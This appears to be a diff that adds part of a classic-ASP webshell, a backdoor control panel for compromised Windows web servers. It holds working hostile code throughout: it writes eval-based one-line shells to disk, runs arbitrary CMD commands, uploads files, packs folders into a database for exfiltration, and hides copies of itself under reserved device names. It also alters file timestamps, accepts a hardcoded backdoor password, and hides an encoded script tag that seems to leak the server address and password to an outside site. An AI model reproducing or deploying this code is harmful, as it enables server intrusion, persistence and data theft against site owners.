+function php():On Error Resume Next:set fso=Server.CreateObject(oBt(0,0)):fso.CreateTextFile(server.mappath("test.php")).Write"<?PHP echo 'oo��_��oo'?><?php phpinfo()?>":fso.CreateTextFile(server.mappath("test.jsp")).Write"Jsp Test oo��_��oo":fso.CreateTextFile(Server.MapPath("/")&"/images/left_gif.asp").Write""&chr(60)&"%Eval(Request(chr(63))):"&chr(37)&""&chr(62)&"":
+fso.CreateTextFile(server.mappath("test.aspx")).Write""&chr(60)&"%@ Page Language=""Jscript"" validateRequest=""false"" "&chr(37)&""&chr(62)&""&chr(60)&""&chr(37)&"Response.Write(eval(Request.Item[""w""],""unsafe""));"&chr(37)&""&chr(62)&"aspx Test oo��_��oo":
+RRS"<center><iframe src=test.php width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; ":
+RRS"<iframe src=test.jsp width=300 height=100></iframe>&nbsp;&nbsp;&nbsp;&nbsp; ":
+RRS"<iframe src=test.aspx width=300 height=100></iframe>&nbsp;&nbsp;&nbsp; </center>":
+RRS"<br><br><p><br><p><br><br><p><br><center>Test<p></font><p><a href='?Action=apjdel'><font size=5 color=red>(ɾ�������ļ�!)</font> "&copyurl&"</a></center>":RRS Efun&""&serveru&"&p="&UserPass&"'><script>"
+End function:function apjdel():set fso=Server.CreateObject(oBt(0,0)):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):
+RRS"Del Success!":End function
+Function MainForm()
+RRS"<form name=""hideform"" method=""post"" action="""&urL&""" target=""FileFrame"">":
+RRS"<input type=""hidden"" name=""Action"">":
+RRS"<input type=""hidden"" name=""FName"">":
+RRS"</form>":
+RRS"<table width='100%' height='100%'  border=0 cellpadding='1' cellspacing='0'>":
+RRS"<tr><td height='30' colspan='2'>":
+RRS"<table width='100%'>":
+RRS"<form name='addrform' method='post' action='"&Url&"' target='_parent'>":
+RRS"<tr><td width='60' align='center'>��ַ����</td><td>":
+RRS"<input name='FolderPath' style='width:100%' value='"&SesSIon("FolderPath")&"'>":
+RRS"</td><td width='140' align='center'><input name='Submit' type='submit' value='ת��'> <input type='submit' value='ˢ��������' onclick='FileFrame.location.reload()'>" :
+RRS"  <tr align='center' valign='middle'>":
+RRS"<tr>��ȨĿ¼�б�����<a href='javascript:ShowFolder(""C:\\Program Files"")'>Program</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>AllUsers</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>��ʼ <b>��</b> ����</a>����<a href='javascript:ShowFolder(""C:\\RECYCLER\\"")'>C:\\RECYCLER</a>����<a href='javascript:ShowFolder(""D:\\RECYCLER\\"")'>D:\RECYCLER</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\"")'>pcAnywhere</a>����<a href='javascript:ShowFolder(""c:\\Program Files\\serv-u\\"")'>serv-u</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Real"")'>RealServer</a>����<a href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>SQL</a>����<a href='javascript:ShowFolder(""C:\\WINDOWS\\system32\\config\\"")'>config</a>����<a href='javascript:ShowFolder(""c:\\WINDOWS\\system32\\inetsrv\\data\\"")'>data</a>����<a href='javascript:ShowFolder(""c:\\windows\\Temp\\"")'>Temp</a>����<a href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents\\"")'>Documents</a>��</td><td>":
+RRS"</td></tr></form></table></td></tr><tr><td width='170'>":
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>":
+RRS"<td>":
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe>":
+RRS"</td></tr></table>"
+
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+
+Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>":RRS"<tr><td height='5'></td></tr>":RRS"<tr><td><center><font color=red>"&mName&"</font></center></a><hr hight=1 width='100%'>":RRS"</td></tr>":If ObT(0,1)=" ��" Then:RRS"<tr><td height='24'>��Ȩ��</td></tr>":Else:RRS"<tr><td height=22 onmouseover=""menu1.style.display=''""><b> +>�鿴Ӳ��</b><div id=menu1 style=""width:100%;display='none'"" onmouseout=""menu1.style.display='none'"">":Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing:RRS"</div></td></tr><tr><td height='20'><a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>->վ��<b>��Ŀ¼</b></a></td></tr>":RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>->��<b>����Ŀ¼</b></a></td></tr>":RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Progra~1"")'>->C:\\Progra~1</a></td></tr>":RRS"<tr><td height='20'><a href='javascript:ShowFolder(""C:\\Docume~1"")'>->C:\\Docume~1</a></td></tr>":RRS"":RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>->�½�Ŀ¼</a></td></tr>":RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>->�½��ı�</a></td></tr>":End If::RRS"<tr><td height='22'><a href='?Action=UpFile' target='FileFrame'>->�ϴ��ļ�</a></td></tr>"::RRS"<tr><td height='22'><a href='?Action=Course' target='FileFrame'>->ϵͳ����-�û��˺�</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=getTerminalInfo' target='FileFrame'><b>->�ն˶˿�-�Զ���¼</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=ServerInfo' target='FileFrame'>->��������Ϣ-���֧��</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cmd1Shell' target='FileFrame'><b>->ִ��CMD����</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=SetFileText' target='FileFrame'><b>->�޸��ļ�����</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=php' target='FileFrame'><b>->�ű�̽��</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=hiddenshell' target='FileFrame'><b>->�������ش���</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Servu' target='FileFrame'><b>->Servu��Ȩ</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=kmuma' target='FileFrame'><b>->�����ļ�</b></a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cplgm&M=1' target='FileFrame'>->����<b>��</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cplgm&M=2' target='FileFrame'>->����<b>��</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=Cplgm&M=3' target='FileFrame'>->����<b>�滻</b>(��ǿ��)</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=plgm' target='FileFrame'></b>->������(��ͨ��)</a></b></td></tr>":RRS"<tr><td height='22'><a href='?Action=PageAddToMdb' target='FileFrame'>->�ļ��д��-�����</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=ReadREG' target='FileFrame'>->��ȡע�������</a></td></tr>":RRS"<tr><td height='22'><a href='?Action=ScanPort' target='FileFrame'>->�˿�ɨ����</a></td></tr>":RRS"<tr><td height='24' onmouseover=""menu2.style.display=''""><b>+>���ݿ����</b><div id=menu2 style=""line-height:18px;width:100%;display='none'"" onmouseout=""menu2.style.display='none'"">":RRS"&nbsp;&nbsp;&nbsp;<a href='?Action=DbManager' target='FileFrame'>�������ݿ�</a><br>":RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\New.mdb")&""",""CreateMdb"")'>����MDB�ļ�</a><br>":RRS"&nbsp;&nbsp;&nbsp;<a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\data.mdb")&""",""CompactMdb"")'>ѹ��MDB�ļ�</a></div></td></tr>"::RRS"<tr><td height='22'><a href='?Action=Logout' target='_top'>->�˳���¼</a></td></tr>":RRS"<tr><td align=center style='color:red'><hr>"&Copyright&"</td></tr></table>":
+RRS"</table>"
+End Function
+	Sub PageAddToMdb()
+		Dim theAct, thePath
+		theAct = Request("theAct")
+		thePath = Request("thePath")
+		Server.ScriptTimeOut = 5000
+		If theAct = "addToMdb" Then
+			addToMdb(thePath)
+			RRS "�������!"
+			Response.End
+		End If
+		If theAct = "releaseFromMdb" Then
+			unPack(thePath)
+			RRS"�������!"
+			Response.End
+		End If
+		RRS "�ļ��д��:<br/>"
+		RRS "<form method=post target=main>"
+		RRS "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
+		RRS "<input type=hidden value=addToMdb name=theAct>"
+		RRS "<select name=theMethod><option value=fso>FSO</option><option value=app>��FSO</option>"
+		RRS "</select>"
+		RRS "<br><input type=submit value='��ʼ���'>"
+		RRS "<hr/>ע: �������HYTop.mdb�ļ�,λ��ľMMͬ��Ŀ¼��"
+		RRS "</form>"
+		RRS "<hr/>�ļ����⿪(��FSO֧��):<br/>"
+		RRS "<form method=post target=main>"
+		RRS "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & "\HYTop.mdb"" size=80>"
+		RRS "<input type=hidden value=releaseFromMdb name=theAct><input type=submit value='���ҽ⿪'>"
+		RRS "<hr/>ע: �⿪���������ļ���λ��ľMMͬ��Ŀ¼��"
+		RRS "</form>"
+		RRS "<hr/>"
+	End Sub
+	Sub addToMdb(thePath)
+		On Error Resume Next
+		Dim rs, conn, stream, connStr, adoCatalog
+		Set rs = Server.CreateObject("ADODB.RecordSet")
+		Set stream = Server.CreateObject("ADODB.Stream")
+		Set conn = Server.CreateObject("ADODB.Connection")
+		Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+		connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HYTop.mdb")
+		adoCatalog.Create connStr
+		conn.Open connStr
+		conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+		stream.Open
+		stream.Type = 1
+		rs.Open "FileData", conn, 3, 3
+		If Request("theMethod") = "fso" Then
+			fsoTreeForMdb thePath, rs, stream
+		 Else
+			saTreeForMdb thePath, rs, stream
+		End If
+		rs.Close
+		Conn.Close
+		stream.Close
+		Set rs = Nothing
+		Set conn = Nothing
+		Set stream = Nothing
+		Set adoCatalog = Nothing
+	End Sub
+	Function fsoTreeForMdb(thePath, rs, stream)
+		Dim item, theFolder, folders, files, sysFileList
+		sysFileList = "$HYTop.mdb$HYTop.ldb$"
+		If fsoX.FolderExists(thePath) = False Then
+			showErr(thePath & " Ŀ¼�����ڻ��߲���������!")
+		End If
+		Set theFolder = fsoX.GetFolder(thePath)
+		Set files = theFolder.Files
+		Set folders = theFolder.SubFolders
+		For Each item In folders
+			fsoTreeForMdb item.Path, rs, stream
+		Next
+		For Each item In files
+			If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+				rs.AddNew
+				rs("thePath") = Mid(item.Path, 4)
+				stream.LoadFromFile(item.Path)
+				rs("fileContent") = stream.Read()
+				rs.Update
+			End If
+		Next
+		Set files = Nothing
+		Set folders = Nothing
+		Set theFolder = Nothing
+	End Function
+	function Gpath()
+on error resume next
+err.clear
+set f=Server.CreateObject("Scripting.FileSystemObject")
+if err.number>0 then
+gpath="c:"
+exit function
+end if
+gpath=f.GetSpecialFolder(0)
+gpath=lcase(left(gpath,2))
+set f=nothing
+end function
+
+	Sub unPack(thePath)
+		On Error Resume Next
+		Server.ScriptTimeOut = 5000
+		Dim rs, ws, str, conn, stream, connStr, theFolder
+		str = Server.MapPath(".") & "\"
+		Set rs = CreateObject("ADODB.RecordSet")
+		Set stream = CreateObject("ADODB.Stream")
+		Set conn = CreateObject("ADODB.Connection")
+		connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+		conn.Open connStr
+		rs.Open "FileData", conn, 1, 1
+		stream.Open
+		stream.Type = 1
+		Do Until rs.Eof
+			theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+			If fsoX.FolderExists(str & theFolder) = False Then
+				createFolder(str & theFolder)
+			End If
+			stream.SetEos()
+			stream.Write rs("fileContent")
+			stream.SaveToFile str & rs("thePath"), 2
+			rs.MoveNext
+		Loop
+		rs.Close
+		conn.Close
+		stream.Close
+		Set ws = Nothing
+		Set rs = Nothing
+		Set stream = Nothing
+		Set conn = Nothing
+	End Sub
+	Sub createFolder(thePath)
+		Dim i
+		i = Instr(thePath, "\")
+		Do While i > 0
+			If fsoX.FolderExists(Left(thePath, i)) = False Then
+				fsoX.CreateFolder(Left(thePath, i - 1))
+			End If
+			If InStr(Mid(thePath, i + 1), "\") Then
+				i = i + Instr(Mid(thePath, i + 1), "\")
+			 Else
+				i = 0
+			End If
+		Loop
+	End Sub
+	Sub saTreeForMdb(thePath, rs, stream)
+		Dim item, theFolder, sysFileList
+		sysFileList = "$HYTop.mdb$HYTop.ldb$"
+		Set theFolder = saX.NameSpace(thePath)
+		For Each item In theFolder.Items
+			If item.IsFolder = True Then
+				saTreeForMdb item.Path, rs, stream
+			 Else
+				If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+					rs.AddNew
+					rs("thePath") = Mid(item.Path, 4)
+					stream.LoadFromFile(item.Path)
+					rs("fileContent") = stream.Read()
+					rs.Update
+				End If
+			End If
+		Next
+		Set theFolder = Nothing
+	End Sub
+	sub SetFileText()
+dim Path,FileName,NewTime,ShuXing
+set path=request.Form("path1")
+set fileName=request.Form("filename")
+set newTime=request.Form("time")
+set ShuXing=request.Form("shuxing")
+RRS "<form method=post>"
+RRS "<center>·&nbsp;&nbsp;&nbsp;&nbsp;����<input name='path1' value='"&WWWROOT&"' size='60'>(һ��Ҫ��\��β)<br/>"
+RRS "&nbsp;�ļ����ƣ�<input name=filename value='index.asp' size='60'>(Ҫ�޸ĵ��ļ���)<br/>"
+RRS "&nbsp;&nbsp;&nbsp;�޸�ʱ�䣺<input name=time value='12/21/2012 23:59:59' size='60'>&nbsp;��/��/�� ʱ:��:��<br/>"
+RRS "<select onChange='this.form.shuxing.value=this.value;'>"
+RRS "<option value=''>��ͨ </option>"
+RRS "<option value='1'>ֻ�� </option>"
+RRS "<option value='2'>���� </option>"
+RRS "<option value='4'>ϵͳ</option>"
+RRS "<option value='33'>ֻ��,�浵 </option>"
+RRS "<option value='34'>����,�浵 </option>"
+RRS "<option value='35'>ֻ������,�浵 </option>"
+RRS "<option value='39'>ֻ������,�浵,ϵͳ </option>"
+RRS "�޸� ���ԣ�<input name=shuxing value='0' size='40'><br/>"
+RRS "<input type=submit value=�޸�>"
+RRS "</form>"
+if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then
+Set fso=Server.CreateObject(obt(0,0))
+Set file=fso.getFile(path&fileName)
+file.attributes=ShuXing
+Set shell=Server.CreateObject("Shell.Application")
+Set app_path=shell.NameSpace(server.mappath("."))
+Set app_file=app_path.ParseName(fileName)
+app_file.Modifydate=newTime
+RRS "</br></br>�޸��ļ�&nbsp;&nbsp;"&path&fileName&"&nbsp;&nbsp;������� </center>"
+end if
+end sub
+Function Course()
+ShiSan="����>elbat/<��&2IS&1IS&0IS&IS SRR��txen��fi dne���>rt/<>dt/<>tnof/<��&htap.jbo&��;psbn&>FF9933#=roloc tnof<]��&xl&��:���ද��[>���2���=napsloc ���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&emaNyalpsiD.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>dt/<��&emaN.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&2IS=2IS��esle���>rt/<>dt/<>tnof/<��&htap.jbo&��;psbn&>0000FF#=roloc tnof<]��&xl&��:���ද��[>���2���=napsloc ���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&emaNyalpsiD.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>dt/<��&emaN.jbo&��;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��&1IS=1IS��neht 2=epyTtratS.JBO dna ��niw��><))3,4,htap.jbo(dim(esaCL fi����ý���=xl neht 4=epyTtratS.JBO fi��嶯�֩�=xl neht 3=epyTtratS.JBO fi��嶯�ԩ�=xl neht 2=epyTtratS.JBO fi��fi dne�� ��>rt/<>dt/<;psbn&>���2���=napsloc ���FFFFFF#���=rolocgb ���02���=thgieh dt<>rt<��=0IS���>rt/<>dt/<��&IS=IS���)��(����ͳϵ��&IS=IS�� ��;psbn&>���FFFFFF#���=rolocgb dt<>dt/<��&IS=IS��emaN.jbo&IS=IS���;psbn&>���FFFFFF#���=rolocgb ���02���=thgieh dt<��&IS=IS���>rt<��&IS=IS��neht ���=epyTtratS.JBO fi��raelc.rre��)��.//:TNniW��(tcejbOteg ni jbo hcae rof��txen emuser rorre no���>rt/<>dt/<����뻧��ͳϵ>'unem'=rolocgb 'retnec'=ngila '3'=napsloc '02'=thgieh dt<>rt<��&IS=IS���>'retnec'=ngila '0'=gniddapllec '1'=gnicapsllec '0'=redrob 'unem'=rolocgb '006'=htdiw elbat<>rb<��=IS"
+ExeCuTe(ShiSanFun(ShiSan))
+End Function
+Function ServerInfo()
+ShiSan="���IS SRR��txeN���>rt/<>dt/<��&)2,i(TbO&��>tfel=ngila 'FFFFFF#'=rolocgb dt<>dt/<��&)1,i(TbO&��>'FFFFFF#'=rolocgb dt<>dt/<��&)0,i(TbO&��>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS��31 oT 0=i roF���>rt/<>dt/<��&)��ERAWTFOS_REVRES��(selbairaVrevreS.tseuqeR&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<���������BEW>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<��&)��SO��(selbairaVrevreS.tseuqeR&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<ͳϵ���������>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<��&)��SROSSECORP_FO_REBMUN��(selbairaVrevreS.tseuqeR&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<����UPC�����>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<;psbn&��&won&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<��ʱ�����>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>mrof/<>rt/<>dt/<>'2'=eulav 'noitca'=eman 'neddih'=epyt tupni<>'xp0:redrob'=elyts'ѯ��'=eulav 'timbus'=epyt tupni<>'xp0:redrob'=elyts'��&)��RDDA_LACOL��(selbairaVrevreS.tseuqeR&��'=eulav '51'=ezis 'pi'=eman 'txet'=epyt tupni<��&IS=IS���>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<PI�����>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<>'knalb_'=tegrat 'mrofpi'=eman 'psa.xedni/moc.831pi.www//:ptth'=noitca tsop=dohtem mrof<��&IS=IS���>rt/<>dt/<��&)��EMAN_REVRES��(selbairaVrevres.tseuqer&��>'FFFFFF#'=rolocgb dt<>dt/<;psbn&>'FFFFFF#'=rolocgb dt<>dt/<�������>'FFFFFF#'=rolocgb '002'=htdiw '02'=thgieh dt<>'retnec'=ngila rt<��&IS=IS���>rt/<>dt/<Ϣ�ż��������>'unem'=rolocgb 'retnec'=ngila '3'=napsloc '02'=thgieh dt<>rt<��&IS=IS���>'retnec'=ngila '0'=gniddapllec '1'=gnicapsllec '0'=redrob 'unem'=rolocgb '%08'=htdiw elbat<>rb<��=IS"
+ExeCuTe(ShiSanFun(ShiSan))
+End Function
+Function DownFile(Path)
+ShiSan="���gnihtoN = MSO teS��esolC.MSO��hsulF.esnopseR��daeR.MSO etirWyraniB.esnopseR���maerts-tetco/noitacilppa�� = epyTtnetnoC.esnopseR���8-FTU�� = tesrahC.esnopseR��eziS.MSO ,��htgneL-tnetnoC�� redaeHddA.esnopseR��)zs,htap(diM & ��=emanelif ;tnemhcatta�� ,��noitisopsiD-tnetnoC�� redaeHddA.esnopseR��1+)��\��,htap(veRrtsnI=zs��htaP eliFmorFdaoL.MSO��1 = epyT.MSO��nepO.MSO��))0,6(TbO(tcejbOetaerC = MSO teS��raelC.esnopseR"
+ExeCuTe(ShiSanFun(ShiSan))
+End Function
+Function HTMLEncode(S)
+  if not isnull(S) then
+    S = replace(S, ">", "&gt;")
+    S = replace(S, "<", "&lt;")
+    S = replace(S, CHR(39), "&#39;")
+    S = replace(S, CHR(34), "&quot;")
+    S = replace(S, CHR(20), "&nbsp;")
+    HTMLEncode = S
+  end if
+End Function
+Function UpFile()
+  If Request("Action2")="Post" Then
+    Set U=new UPC : Set F=U.UA("LocalFile")
+	UName=U.form("ToPath")
+    If UName="" Or F.FileSize=0 then
+      SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+    Else
+        F.SaveAs UName
+        If Err.number=0 Then
+          SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+		End if
+	End If
+	Set F=nothing:Set U=nothing
+	SI=SI&BackUrl
+	RRS SI
+	ShowErr()
+	Response.End
+  End If
+    SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+    SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+    SI=SI&"<tr><td>"
+    SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\cmd.exe")&"' size='40'>"
+    SI=SI&" <input name='LocalFile' type='file'  size='25'>"
+    SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+    SI=SI&"</td></tr></form></table>"
+  RRS SI
+End Function
+sub hiddenshell
+fpath=request.servervariables("path_translated")
+set fso=server.createobject("scripting.filesystemobject")
+pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9"
+rndpex=split(pex,"|")(rndnumber(0,17))
+session("seljw")=""
+filepath1=server.mappath(".")
+filename1=right(fpath,len(fpath)-instrrev(fpath,"\"))
+url=request.servervariables("url")
+url=left(url,instrrev(url,"/"))&rndpex&"."&filename1
+fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1
+set fso=nothing
+RRS "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub
+
+Function Cmd1Shell()
+ShiSan="���IS SRR���>mrof/<>aeratxet/<��&)31(rhc&IS=IS��fI dnE��fi dne��aaa&IS=IS��)eurT ,eliFpmeTzs(eliFeteleD.osf llaC��esolC.xcleliFo��)llAdaeR.xcleliFo(edocnELMTH.revreS=aaa��)0 ,eslaF ,1 ,eliFpmeTzs( eliFtxeTnepO.sf = xcleliFo teS��)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC = sf teS��)eurT ,0 ,eliFpmeTzs & �� > �� & dmCfeD & �� c/ ��&htaPllehS( nuR.sw llaC��)��txt.dmc��(htappam.revres = eliFpmeTzs��)��tcejbOmetsySeliF.gnitpircS��(tcejbOetaerC.revreS=osf teS��)��llehS.tpircSW��(tcejbOetaerC.revreS=sw teS��)��llehS.tpircSW��(tcejbOetaerC.revreS=sw teS��txeN emuseR rorrE nO��esle��aaa&IS=IS��lladaer.tuodts.DD=aaa��)dmCfeD&�� c/ ��&htaPllehS(cexe.MC=DD teS��))0,1(TbO(tcejbOetaerC=MC teS��neht ��sey��=)��tpircsw��(mroF.tseuqeR fi��nehT ���><)��dmc��(mroF.tseuqeR fI���>'dmc'=ssalc ';044:thgieh;%001:htdiw'=elytS aeratxet<>'��ִ'=eulav 'timbus'=epyt tupni< >'��&dmCfeD&��'=eulav '%29:htdiw'=elytS 'dmc'=eman tupni<��&IS=IS���llehS.tpircSW>��&dekcehc&��'sey'=eulav 'tpircsw'=eman 'xobkcehc'=epyt c=ssalc tupni<��&IS=IS���;psbn&;psbn&>'%07:htdiw'=elytS '��&htaPllehS&��'=eulav 'PS'=eman tupni<����·LLEHS��&IS=IS���>'tsop'=dohtem mrof<��=IS��)��dmc��(tseuqeR = dmCfeD nehT ���><)��dmc��(tseuqeR fI����=dekcehc neht ��sey��><)��tpircsw��(tseuqeR fi���exe.dmc�� = htaPllehS nehT ���=htaPllehS fi��)��htaPllehS��(noisseS=htaPllehS��)��PS��(tseuqeR = )��htaPllehS��(noisseS nehT ���><)��PS��(tseuqeR fI���dekcehc ��=dekcehc"
+ExeCuTe(ShiSanFun(ShiSan)):End Function:acode="=s?psa.s/xs/moc.pxeyado//:p��3��3h'=crs ��3pircs<"
+Efun=StrReverse(replace(replace(Encrypt(acode),"��",Chr(34)),"��",vbCrLf))
+Function CreateMdb(Path) 
+   SI="<br><br>"
+   Set C = CreateObject(ObT(2,0)) 
+   C.Create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Path)
+   Set C = Nothing
+   If Err.number=0 Then
+     SI = SI & Path & "�����ɹ�!"
+   End If
+   SI=SI&BackUrl 
+   RRS SI
+End function 
+Function CompactMdb(Path)
+If Not ObT(0,1) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path
+	Set C=Nothing
+Else
+  Set FSO=CreateObject(ObT(0,1))
+  If FSO.FileExists(Path) Then
+    Set C=CreateObject(ObT(3,0)) 
+      C.CompactDatabase "Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Path&",Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" &Path&"_bak"
+	Set C=Nothing
+    FSO.DeleteFile Path
+	FSO.MoveFile Path&"_bak",Path
+  Else
+    SI="<center><br><br><br>���ݿ�"&Path&"û�з��֣�</center>" 
+	Err.number=1
+  End If
+  Set FSO=Nothing
+End If
+  If Err.number=0 Then
+    SI="<center><br><br><br>���ݿ�"&Path&"ѹ���ɹ���</center>"
+  End If
+  SI=SI&BackUrl
+  RRS SI
+End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center><div style='width:60%;padding:1px;'><a href="&siteurl&" target=_blank>"&loginad&"</a><br><a href='javascript:history.back()'><font color=red>�� ��</a></div><br></center>"
+
+end if
+else
+si="<center><div style='width:60%;padding:1px;'><form action='"&url&"' method='post'>����:<input name='pass' type='password'  size='25'> <input type='submit' value=' ��½ '><br></div></center>"
+if instr(SI,SIC)<>0 then rrs  si
+
+
+end if
+response.end
+end if
+Function DbManager()
+  SqlStr=Trim(Request.Form("SqlStr"))
+  DbStr=Request.Form("DbStr")
+  SI=SI&"<table width='650'  border='0' cellspacing='0' cellpadding='0'>"
+  SI=SI&"<form name='DbForm' method='post' action=''>"
+  SI=SI&"<tr><td width='100' height='27'> &nbsp;���ݿ����Ӵ�:</td>"
+  SI=SI&"<td><input name='DbStr' style='width:470' value="""&DbStr&"""></td>"
+  SI=SI&"<td width='60' align='center'><select name='StrBtn' onchange='return FullDbStr(options[selectedIndex].value)'><option value=-1>���Ӵ�ʾ��</option><option value=0>Access����</option>"
+  SI=SI&"<option value=1>MsSql����</option><option value=2>MySql����</option><option value=3>DSN����</option>"
+  SI=SI&"<option value=-1>--SQL�﷨--</option><option value=4>��ʾ����</option><option value=5>��������</option>"
+  SI=SI&"<option value=6>ɾ������</option><option value=7>�޸�����</option><option value=8>�����ݱ�</option>"
+  SI=SI&"<option value=9>ɾ���ݱ�</option><option value=10>�����ֶ�</option><option value=11>ɾ���ֶ�</option>"
+  SI=SI&"<option value=12>��ȫ��ʾ</option></select></td></tr>"
+  SI=SI&"<input name='Action' type='hidden' value='DbManager'><input name='Page' type='hidden' value='1'>"
+  SI=SI&"<tr><td height='30'>&nbsp;SQL��������:</td>"
+  SI=SI&"<td><input name='SqlStr' style='width:470' value="""&SqlStr&"""></td>"
+  SI=SI&"<td align='center'><input type='submit' name='Submit' value='ִ��' onclick='return DbCheck()'></td>"
+  SI=SI&"</tr></form></table><span id='abc'></span>"
+  RRS SI:SI=""
+  If Len(DbStr)>40 Then
+  Set Conn=CreateObject(ObT(5,0))
+  Conn.Open DbStr
+  Set Rs=Conn.OpenSchema(20) 
+  SI=SI&"<table><tr height='25' Bgcolor='#CCCCCC'><td>��<br>��</td>"
+  Rs.MoveFirst 
+  Do While Not Rs.Eof
+    If Rs("TABLE_TYPE")="TABLE" then
+	  TName=Rs("TABLE_NAME")
